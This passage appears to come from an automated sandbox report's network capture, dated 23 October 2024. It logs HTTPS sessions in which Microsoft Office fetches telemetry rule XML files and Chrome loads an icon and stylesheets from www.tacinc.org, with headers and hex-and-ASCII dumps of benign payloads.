                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              63192.168.2.64978913.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                              x-ms-request-id: 5fe4afb9-d01e-008e-4659-23387a000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180406Z-17fbfdc98bbk7nhquz3tfc3wbg000000067g000000000f41
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              64192.168.2.649795141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC697OUTGET /wp-content/themes/tac-child/images/search-icon.svg HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.css
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC482INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:11:19 GMT
                                                                                                                                                                                                                              ETag: W/"66f56b87-938"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614818
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5cf4d8b4629-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC887INData Raw: 39 33 38 0d 0a 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 34 20 31 34 22 20 77 69 64 74 68 3d 22 31 34 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 31 31 2e 38 31 37 33 32 39 33 20 31 30 2e 39 37 33 30 33 35 37 2d 32 2e 36 39 37 38 39 32 31 39 2d 32 2e 37 30 31 30 35 34 33 63 2e 33 32 37 38 37 31 33 32 2d 2e 34 31 32 36 36 33 32 35 2e 35 39 30 31 36 32 37 34 2d 2e 38 39 35 36 36 30 34 31 2e 37 38 36 38 38 35 32 32 2d 31 2e 34 34 39 30 30 34 2e 31 39 36 37 32 32 34 37 2d 2e 35 35 33 33 34 33 35 38 2e 32 39 35 30 38 32 31 37 2d 31 2e 31 33 30 31 32 36 30 36 2e 32 39 35 30 38 32 31 37 2d 31 2e 37 33 30 33 36 33 30
                                                                                                                                                                                                                              Data Ascii: 938<svg height="14" viewBox="0 0 14 14" width="14" xmlns="http://www.w3.org/2000/svg"><path d="m11.8173293 10.9730357-2.69789219-2.7010543c.32787132-.41266325.59016274-.89566041.78688522-1.449004.19672247-.55334358.29508217-1.13012606.29508217-1.7303630
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 38 2e 32 36 32 36 30 33 36 33 20 31 2e 32 37 38 36 38 35 31 37 2e 33 39 33 39 30 33 30 33 20 31 2e 39 38 31 32 36 34 37 38 2e 33 39 33 39 30 33 30 33 2e 35 39 39 35 33 34 32 31 20 30 20 31 2e 31 36 36 32 37 34 35 36 2d 2e 30 39 38 34 37 35 20 31 2e 37 30 30 32 33 35 31 33 2d 2e 32 39 35 34 32 38 30 35 2e 35 33 33 39 35 39 2d 2e 31 39 36 39 35 33 31 20 31 2e 30 32 35 37 35 37 33 38 2d 2e 34 35 39 35 35 32 20 31 2e 34 37 35 34 30 39 32 31 2d 2e 37 38 37 38 30 37 36 38 6c 32 2e 36 39 37 38 39 32 32 32 20 32 2e 37 30 31 30 35 35 30 33 63 2e 30 36 35 35 37 33 36 2e 30 36 35 36 35 31 2e 31 33 38 31 37 32 37 2e 31 31 32 35 34 33 39 2e 32 31 37 37 39 38 39 2e 31 34 30 36 38 2e 30 37 39 36 32 34 35 2e 30 32 38 31 33 36 31 2e 31 34 37 35 33 39 35 2e 30 34 32 32 30
                                                                                                                                                                                                                              Data Ascii: 8.26260363 1.27868517.39390303 1.98126478.39390303.59953421 0 1.16627456-.098475 1.70023513-.29542805.533959-.1969531 1.02575738-.459552 1.47540921-.78780768l2.69789222 2.70105503c.0655736.065651.1381727.1125439.2177989.14068.0796245.0281361.1475395.04220
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC111INData Raw: 32 2d 2e 32 39 35 30 38 32 2d 31 2e 35 31 39 33 34 32 35 39 7a 22 20 66 69 6c 6c 3d 22 23 32 32 61 39 64 30 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 73 74 72 6f 6b 65 3d 22 23 32 32 61 39 64 30 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 20 31 29 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: 2-.295082-1.51934259z" fill="#22a9d0" fill-rule="evenodd" stroke="#22a9d0" transform="translate(1 1)"/></svg>
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              65192.168.2.64979213.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 423
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                              x-ms-request-id: efc778c0-f01e-0052-4de5-219224000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180406Z-r1755647c66x46wg1q56tyyk6800000007yg000000000cr2
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              66192.168.2.64979013.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                              x-ms-request-id: 064568ba-501e-008c-7d65-23cd39000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180406Z-17fbfdc98bb7k7m5sdc8baghes000000068g000000001f8r
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              67192.168.2.649796141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC572OUTGET /wp-content/uploads/elementor/css/post-865.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC477INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 17:01:43 GMT
                                                                                                                                                                                                                              ETag: W/"670e9ff7-491"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614818
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5cf7ffc3064-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC892INData Raw: 34 39 31 0d 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6b 69 74 2d 38 36 35 7b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 3a 23 36 45 43 31 45 34 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 3a 23 35 34 35 39 35 46 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 74 65 78 74 3a 23 37 41 37 41 37 41 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 61 63 63 65 6e 74 3a 23 36 31 43 45 37 30 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 70 72 69 6d 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 52 6f 62 6f 74 6f 22 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 70 72 69 6d 61 72 79 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 2d 2d 65 2d
                                                                                                                                                                                                                              Data Ascii: 491.elementor-kit-865{--e-global-color-primary:#6EC1E4;--e-global-color-secondary:#54595F;--e-global-color-text:#7A7A7A;--e-global-color-accent:#61CE70;--e-global-typography-primary-font-family:"Roboto";--e-global-typography-primary-font-weight:600;--e-
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC284INData Raw: 78 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2d 62 6f 78 65 64 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 32 34 70 78 3b 7d 2e 65 2d 63 6f 6e 7b 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 6d 61 78 2d 77 69 64 74 68 3a 31 30 32 34 70 78 3b 7d 7d 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 37 70 78 29 7b 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2d 62 6f 78 65 64 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 37 36 37 70 78 3b 7d 2e 65 2d 63 6f 6e 7b 2d 2d 63
                                                                                                                                                                                                                              Data Ascii: x-width:1024px){.elementor-section.elementor-section-boxed > .elementor-container{max-width:1024px;}.e-con{--container-max-width:1024px;}}@media(max-width:767px){.elementor-section.elementor-section-boxed > .elementor-container{max-width:767px;}.e-con{--c
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              68192.168.2.649797141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC596OUTGET /wp-content/plugins/powerpack-elements/assets/css/min/frontend.min.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 17:38:02 GMT
                                                                                                                                                                                                                              ETag: W/"66f59bfa-51fd4"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614817
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5cf7d212832-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC890INData Raw: 37 64 64 31 0d 0a 64 69 76 5b 63 6c 61 73 73 2a 3d 27 20 70 70 2d 27 5d 2c 64 69 76 5b 63 6c 61 73 73 5e 3d 70 70 2d 5d 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68 65 69 67 68 74 3a 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 70 70 2d 76 69 64 65 6f 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d
                                                                                                                                                                                                                              Data Ascii: 7dd1div[class*=' pp-'],div[class^=pp-]{-webkit-box-sizing:border-box;box-sizing:border-box}.clearfix:after{clear:both;content:"";font-size:0;height:0;display:block;visibility:hidden}.elementor-widget-pp-video .elementor-widget-container{overflow:hidden}
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 7d 2e 70 70 2d 6e 6f 2d 74 72 61 6e 73 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 70 70 2d 70 6f 73 2d 61 62 73 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 70 70 2d 69 6d 61 67 65 2d 6f 76 65 72 6c 61 79 2c 2e 70 70 2d 6d 65 64 69 61 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 70 70 2d 6d 65 64 69 61 2d 63 6f 6e 74 65 6e 74 2c 2e 70 70 2d 6d 65 64 69 61 2d 6f 76 65 72 6c 61 79 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 7d 2e 70 70 2d 6d 65 64 69 61 2d 6f 76 65 72 6c 61 79 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 35 73 20 6c 69
                                                                                                                                                                                                                              Data Ascii: }.pp-no-trans{-webkit-transition:none;transition:none}.pp-pos-abs{position:absolute}.pp-image-overlay,.pp-media-background,.pp-media-content,.pp-media-overlay{position:absolute;top:0;left:0;right:0;bottom:0}.pp-media-overlay{-webkit-transition:all .25s li
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 65 69 63 6f 6e 73 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 74 61 72 2d 72 61 74 69 6e 67 20 69 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 74 61 72 2d 72 61 74 69 6e 67 20 69 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 39 33 34 27 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74
                                                                                                                                                                                                                              Data Ascii: f;font-family:eicons;display:inline-block}.elementor-star-rating i{display:inline-block;position:relative;font-style:normal;cursor:default}.elementor-star-rating i:before{content:'\e934';display:block;font-size:inherit;font-family:inherit;position:absolut
